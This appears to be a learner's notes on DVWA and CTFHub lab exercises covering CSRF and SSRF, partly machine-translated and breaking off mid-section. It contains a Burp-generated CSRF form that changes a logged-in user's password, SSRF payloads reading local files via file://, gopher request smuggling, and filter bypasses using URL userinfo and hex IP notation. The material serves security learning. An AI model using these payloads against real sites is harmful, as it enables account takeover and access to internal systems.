CSRF, originally called Cross-site requestforgery (cross-site request forgery)
CSRF attack process
The target user has logged in to the website and is able to perform the functions of the website
The target user accessed the payload constructed by the attacker
The reason for the vulnerability
There is no effective secondary verification and token verification
There are different levels in the DVWA range
LOW
Go in and find that you only need to enter the new password and confirm the new password to modify the password of the account, and F12 did not find the token verification.
Grab the package directly, use burpsuit to make the csrf file, and put it in the root directory. My current password is 123456
<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><formaction="http://127.0.0.1/DVWA-master/vulnerabilities/csrf/"><inputtype="hidden"name="password_new"value="888888"/><inputtype="hidden"name="password_conf"value="888888"/><inputtype="hidden"name="Change"value="Change"/><inputtype="submit"value="Submit request"/></form></body></html>
When I visit the csrf.html file, and click Submit request, because I have logged in to the account webpage and the cookie is returned
The webpage will directly modify the account password that I have logged in
There is no difference between Medium and low levels
When capturing packets with High , you need to change the level to low in burpsuit
It is impossible because it requires secondary verification of the user's current password, and the password cannot be changed without knowing the current password
SSRF
SSRF, the full name of Server Side RequestForgery-server side request forgery
SSRF vulnerability principle The server provides the function of obtaining data from other server applications and does not restrict the filtering of the target address.
Main attack method
Perform port scanning on the external network, the internal network where the server is located, and the local port to obtain banner information of some services
Attacking applications running on the intranet or local
Fingerprint identification of intranet web applications to identify asset information within the enterprise
Attacks on web applications on internal and external networks are mainly attacks that can be achieved using HTTP GET requests
Use file protocol to read local files, etc.
SSRF was learned at CTFHub
Intranet access
Try to access flag.php located at 127.0.0.1
Add /?url=http://127.0.0.1/flag.php directly to the url
You can get the flag
Pseudo-protocol to read files
The previous article on the pseudo agreement has been said many times
Direct access as on the topic/?url=http://127.0.0.1/flag.php
Page back???
The topic is pseudo-protocol, we use pseudo-protocol to read/?url=file:///var/www/html/flag.php
Port scan
The question has already suggested that the port range is 8000-9000
Blast and it's over
Send it to the Repeater to get the flag.
Gopher protocol learning
Gopher is an information search system on the Internet, which organizes files on the Internet into a certain index, and brings users from one place on the Internet to another.
The Gopher protocol supports sending GET and POST requests: you can intercept the get request packet and the post request packet first to form a request that conforms to the gopher protocol
The Gopher protocol can attack Redis, Mysql, FastCGI, Ftp, etc. on the intranet, and can also send GET and POST requests.
The format of the Gopher protocol URL:gopher://<host>:<port>/<gopher-path>_后接TCP数据流
CTFHUP: POST request
I studied this problem all afternoon
hint: This time I send an HTTP POST request. By the way. ssrf is implemented with PHP's curl. And it will track 302 jumps. Come on, Sao Nian
// flag.php<?phperror_reporting(0);if($_SERVER["REMOTE_ADDR"]!="127.0.0.1"){
echo"Just View From 127.0.0.1";return;}$flag=getenv("CTFHUB");$key=md5($flag);if(isset($_POST["key"])&&$_POST["key"]==$key){
echo$flag;
exit;}?>
If you submit the key value directly on the flag.php page, it will return Just View From 127.0.0.1, because your post parameter passed in is not the intranet, but the address you are visiting now, and this file can only be passed through the intranet Internet access
Then we have to think about how to access through the intranet
The Gopher protocol we mentioned above reflects its function here.
First, we will capture the package when uploading the key value
After capturing the packet, we extract the information we need and prepare to construct the payload
Must have the following content
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=e51d59854bfe930e0bf1e608691914f6
We have to do is to make this post the request is passed ?url=127.0.0.1/index.phpon
The payload constructed above is url-encoded. Here you need to pay attention to changing the url encoding of the line break from %0Ato%0D%0A
After three encodings, the following payload is obtained:
The webpage I studied is recorded above, very detailed
Below I will record the part about the FastCGI protocol to facilitate my own review. It is too theoretical and looks too hard.
Overview: FastCGI is a communication protocol; in the CGI protocol, the life cycle of a Web application completely depends on the life cycle of the HTTP request. The FastCGI process is resident. Once started, it can handle all HTTP requests without directly exiting.
- BEGIN_REQUEST: 从 Web 服务器发送到 Web 应用,表示开始处理新的请求。
- ABORT_REQUEST: 从 Web 服务器发送到 Web 应用,表示中止一个处理中的请求。比如,用户在浏览器发起请求后按下浏览器上的「停止按钮」时,会触发这个消息。
- END_REQUEST: 从 Web 应用发送给 Web 服务器,表示该请求处理完成。返回数据包里包含「返回的代码」,它决定请求是否成功处理。
- PARAMS: 「流数据包」,从 Web 服务器发送到 Web 应用。此时可以发送多个数据包。发送结束标识为从 Web 服务器发出一个长度为 0 的空包。且 PARAMS 中的数据类型和 CGI 协议一致。即我们使用 $_SERVER 获取到的系统环境等。
- STDIN: 「流数据包」,用于 Web 应用从标准输入中读取出用户提交的 POST 数据。
- STDOUT: 「流数据报」,从 Web 应用写入到标准输出中,包含返回给用户的数据。
Web server and FastCGI interaction process
The Web server accepts user requests, but the final processing request is completed by the Web application. At this time, the web server is connected to the FastCGI process through a socket
FastCGI process view acceptance = connection received. Select [Accept] or [Reject] to connect. If it is an [accept] connection, read the data packet from the standard input stream
If the connection is not successfully received within the specified time in the FastCGI process, the request fails. Otherwise, the Web server sends a BEGIN_REQUEST type message containing a unique RequestID to the FastCGI process. All subsequent data packet transmissions will contain this RequestID. Then, the Web server sends any number of PARAMS type messages to the FastCGI process. Once the transmission is complete, the Web server sends an empty PARAMS message packet and then closes the stream. In addition, if the user sends POST data, the Web server will write it to standard input (STDIN) and send it to the FastCGI process. When all POST data is sent, an empty standard input (STDIN) will be sent to close the stream.
At the same time, the FastCGI process receives a BEGINREQUEST type data packet. It can reject the request by responding to ENDREQUEST. Or receive and process this request. If it receives a request, the FastCGI process will wait to receive all PARAMS and standard input packets. Then, the request is processed and the returned result is written to the standard output (STDOUT) stream. After the processing is complete, send an empty data packet to the standard output to close the stream, and send an END_REQUEST type message to notify the Web server, telling it whether an error has occurred. The above content comes from the URL given above. There is also a supplementary FastCGI architecture diagram and process.
CTFHUB:FastCGI
Learn again tomorrow!
CTFHUB: Redis
CTFHUB:URL Bypass
hint: http://notfound.ctfhub.com must be included in the requested URL. Try to use some special parts of the URL to bypass this restriction.
Then for this question, we can also use the problem of url parsing
Direct access to the ?url=127.0.0.1/flag.phppage will display the content of the hint
So change the url to ?url=http://[email protected]/flag.phpget the flag
The following is an explanation of the principle
In some cases, the back-end program may parse the accessed URL and filter the resolved host address. At this time, there may be improper parsing of URL parameters, which can bypass the filtering. http://[email protected] When the regular expression filtering of the back-end is not rigorous enough, for example, when the character content from http to com, which is www.baidu.com, is considered to be the host address of the access request, when the content of the above URL is parsed, it is very It may be considered that the host of the access URL is www.baidu.com, but in fact the content requested by this URL is the content on www.4399.com.
CTFHUB: Digital IP Bypass
hint: This time ban dropped 127 and 172. Dotted decimal IP can not be used. But you have to visit 127.0.0.1 again. what can we do about it
Also visit the /?url=127.0.0.1/flag.phppage to put back the banned content
Can't access in decimal system, then can there be octal hexadecimal system?
/?url=0x7f.0x1/flag.php
Here is a supplement that should be originally 0x7f.0x0.0x0.0x1/flag.php, but 127.0.0.1 can be converted to 127.1
CTFHUB: 302 Jump Bypass
hint: There is a very important point in SSRF that the request may follow 302 jump, try to use this to bypass the detection of IP and visit flag.php located at 127.0.0.1.
Why do I ?url=127.0.0.1/flag.phpget the flag when I input it directly
